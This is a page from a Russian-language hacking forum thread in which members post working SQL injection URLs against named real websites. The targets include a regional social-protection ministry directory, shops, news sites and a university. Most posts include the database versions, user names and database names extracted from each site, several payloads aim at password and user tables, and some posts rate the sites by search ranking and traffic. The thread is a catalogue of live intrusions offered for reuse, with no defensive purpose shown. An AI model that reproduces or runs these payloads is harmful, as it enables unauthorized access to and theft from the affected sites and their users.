HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #15091  
Старый 18.06.2012, 20:19
Pirotexnik
Guest
Сообщений: n/a
Провел на форуме:
97332

Репутация: 38
По умолчанию

http://www.meteonova.ru/search/index.htm?req=liststates&stfrom=1101&stto=-1110+UNION+select+1,cast(concat_ws(0x3a,user,host, password)+as+binary),3,4,5+from+mysql.user+--+

root@localhost

ТИЦ 700

PR 5

трафф - 10к
 
Ответить с цитированием

  #15092  
Старый 20.06.2012, 10:45
Unknown
Guest
Сообщений: n/a
Провел на форуме:
129743

Репутация: 92
По умолчанию

ТЕЛЕФОННЫЙ СПРАВОЧНИК

МИНИСТЕРСТВА СОЦИАЛЬНОЙ ЗАЩИТЫ НАСЕЛЕНИЯ АМУРСКОЙ ОБЛАСТИ


Код:
Code:
http://help.amurobl.ru/tel/index.php?id=1+and+1=0+union+select+1,2,group_concat(column_name+separator+0x3a),4,5,6,7,8,9,10,1,12,13+from+information_schema.columns+where+table_name=0x7573657273--+
5.1.56 / ter@94.25.80.237

Код:
Code:
Database: mszn
 
Ответить с цитированием

  #15093  
Старый 21.06.2012, 20:18
SofiaLoar
Новичок
Регистрация: 26.04.2026
Сообщений: 0
Провел на форуме:
0

Репутация: 0
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.toydorks.com/displayproduct.php?item=-1+union+select+1,2,3,group_concat(table_name+separator+0x3C62723E),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+information_schema.tables[/COLOR][/COLOR] 
PR: 4

канада,игрушки

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.hitchedmag.com/article.php?id=-1+union+select+1,2,3,4,5,6,7,8,group_concat(table_name,0x3a,column_name+separator+0x3C62723E),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+information_schema.columns+--+[/COLOR][/COLOR] 
PR:3

Код:
Code:
http://www.readingmatters.co.uk/book2.php?id=1111111111111111+union+select+1,2,3,4,5,6,7,group_concat(table_name,0x3a,column_name+separator+0x3C62723E),9+from+information_schema.columns+--+
CY:10 PR:5

имеется таблица wp_users в базе readingmatters-wp,но я туда не смог добраться почему-то

Код:
Code:
http://www.hondashowoff.com/profile.php?id=-1+union+select+user_password+from+users+--+
Blind sql

CY:10 PR:3

Код:
Code:
http://www.greenenaftaligallery.com/artist.php?id=-1+union+select+1,version(),user(),4,5,6,7+--+
PR:5

Код:
Code:
http://www.benayoun.com/projet.php?id=-1+union+select+version()/*+
PR:5
 
Ответить с цитированием

  #15094  
Старый 22.06.2012, 17:13
nemaniak
Участник форума
Регистрация: 10.06.2008
Сообщений: 201
Провел на форуме:
1174919

Репутация: 229
По умолчанию

jazzcorner.com PR-6

Код:
Code:
www.jazzcorner.com/news/display.php?news=-2060+union+select+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,0,11,12,13,14,15,16+--+
Код:
Code:
5.0.95-community:jazzcorn_jcadmin@drums.jazzcorner.com:jazzcorn_main
leavenworth.org PR-5

Код:
Code:
www.leavenworth.org/modules/event/events.php?pageid=26'+and(select+1+from(select+count(*),concat((select+concat_ws(0x3a,version(),user(),database())),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+'QceT'='QceT--&path=26&print=true
Код:
Code:
5.0.45:LCC_ChamberR@localhost:lcc1
localcrimenews.com PR-5

Код:
Code:
www.localcrimenews.com/lookup.php?uid=99999&jid=-6975733+UnIon+selECt+1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47+--+&refid=1950&cname=Gilroy
Код:
Code:
5.1.63-cll:theur_cacrime@localhost:theur_cacrime
 
Ответить с цитированием

  #15095  
Старый 23.06.2012, 08:25
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

office@10.0.0.1:5.0.51a-log:antique

Цитата:
Сообщение от None  
http://www.artantique.ru/article-item.phtml?id='-11'+union+select+concat_ws(0x3a,user(),version(),d atabase())+--+
u329879_bitmafua@10.9.11.99:5.5.15-log:u329879_bitmafua

Цитата:
Сообщение от None  
http://www.bit-mfua.ru/voting/3/
POST:action=addvoice&answer=11' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select concat_ws(0x3a,user(),version(),database())),1,63) , FLOOR(RAND(0)*2)))#
rbc@localhost:5.1.29-rc-log:rbc

Цитата:
Сообщение от None  
http://wap.rbc.ru/content/item.phtml?secid=163&flid=-7333035+union+select+1,(select(@x)from(select(@x:= 0x00),(select(0)from(information_schema.columns)wh ere(table_schema!=0x696e666f726d6174696f6e5f736368 656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_ schema,0x2e,table_name,0x3a,column_name))))x),3+--+&itid=63028'c&page=&s=b81f0dca&pid=54886&oid=279& mode=tr
 
Ответить с цитированием

  #15096  
Старый 23.06.2012, 10:04
HellFire
Познающий
Регистрация: 18.01.2009
Сообщений: 62
Провел на форуме:
2832076

Репутация: 42
По умолчанию

Возобновляемые источники энергии и энергоэффективность.

Код:
Code:
http://www.reeep.org/index.php?id=9353&text=&special=viewitem&cid=1-1+UNION+SELECT+1,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
Database Version: 5.0.22-Debian_0ubuntu6.06.5-log

Database name: conx26_reeep

User name: reeep@web2.reegle.info

ТИЦ: 10

PR: 6


Говнобложек.

Код:
Code:
http://www.getoutthere.info/blog.php?id=1-1+UNION+SELECT+1,2,3,4,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),6,7,8,9,10,11,12,13,14--
Database Version: 5.0.86

Database name: getoutthere

User name: posactivities@localhost

ТИЦ: 0

PR: 3


Кофейный магазин.

Код:
Code:
http://www.freshcup.com/featured-article.php?id=1-1+UNION+SELECT+1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),4,5,6,7--
Database Version: 5.0.77-log

Database name: 417980_freshcup

User name: 417980_freshcup@172.17.66.136

ТИЦ: 10

PR: 5


Магазин виниловых-наклеек.

Код:
Code:
http://www.33dodo.ru/goods.php?id=1-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),36,37--
Database Version: 5.0.92-log

Database name: dodo6909_33dodoru

User name: dodo6909_33dodor@localhost

ТИЦ: 60

PR: 3


Профессиональное звуковое и световое оборудование.

Код:
Code:
http://www.sstrade.ru/goods.php?id=1-1+UNION+SELECT+1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71)--
Database Version: 4.1.25

Database name: test

User name: root@localhost

ТИЦ: 20

PR: 2


Генетика и магазин реагентов.

Код:
Code:
http://imgenex.com/view_data_page.php?id=1-1+UNION+SELECT+1,CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),3,4,5,6,7--
Database Version: 5.0.77

Database name: ssingh_plpdb

User name: root@localhost

ТИЦ: 20

PR: 5
 
Ответить с цитированием

  #15097  
Старый 23.06.2012, 15:32
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

http://www.esoterica.ru/catalog.php?c=1&b=-22%20and%201=2%20union%20select%20aes_decrypt(aes_ encrypt(concat_ws(0x3a,@@version,user(),database() ),0x71),0x71)+--

4.1.13a-nt-max-log gb_esoterica@10.0.1.20 gb_esoterica
 
Ответить с цитированием

  #15098  
Старый 23.06.2012, 20:22
Skofield
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582

Репутация: 394
По умолчанию

Код:
Code:
http://sites.upc.edu/aaupc/index.php?option=com_content&task=view&id=474&idpag=301&Itemid=157&ID=3344+or+(@:=1)||@+group+by+concat((select+substr(concat_ws(0x3a,user,pwd),1,100)+from+users+limit+0,1),@:=@-1)having+@||min(@:=0)--+
Database Version: 5.0.32-Dotdeb_1.dotdeb.1-log

Database name: aaupc

User name: admaaupc@morguapu.upc.es

Код:
Code:
http://sites.upc.edu/~w-unesco/angles/noticia.php?id=-62+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,0,11,12,13,14+from+information_schema.tables--
Database name: w-unesco

User name: w-unesco@localhost
 
Ответить с цитированием

  #15099  
Старый 25.06.2012, 14:03
Unknown
Guest
Сообщений: n/a
Провел на форуме:
28262

Репутация: 23
По умолчанию

SITE: top.ryazan.ru

DB: bukan192_toprzn

MySQL version: 5.1.63

MySQL user: bukan192_btoprzn

Скрин сайта:


Информация о сайте:

тИЦ: 90

Google PageRank: 3

Users: >4000

IP сайта: 92.63.107.233

Страниц в Google: 6090

Веб-сервер: nginx (1.2.1)

Хостинг сайта: webdc.ru

__________________________________________________ __________

Инъекция:

Цитата:
Сообщение от None  
http://top.ryazan.ru/top.php?cat=-3+union+select+1,2,3,4,
5
,
6
,7,8,9,10,11,
12
,13,
14
,15,16,17,18,19,20,21+--+
Вывод на страницу: 5,6,12,14
 
Ответить с цитированием

  #15100  
Старый 25.06.2012, 17:36
cat1vo
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937

Репутация: 0
По умолчанию

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.tesar[dot]ru/faq/?func=show_answer&f_id=1-1+union+all+select+1,concat_ws(0x3a,user(),database(),version()),3--+[/COLOR][/COLOR] 
User: tesar@localhost

Database: tesar

Version: 5.0.92


PR - 3

CY - 170

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]http[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#FF8000"]//www.edimax[dot]ru/ru/events_detail.php?e_id=1-1+union+all+select+1,2,3,4,user(),file_priv,7,8+from+mysql.user+where+user=0x726f6f74--+

[/COLOR][/COLOR
User: root@zvm30.host.ru

Database: edimaxc_ua

Version: 5.0.96

File_priv: Y


PR - 5

CY - 160
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ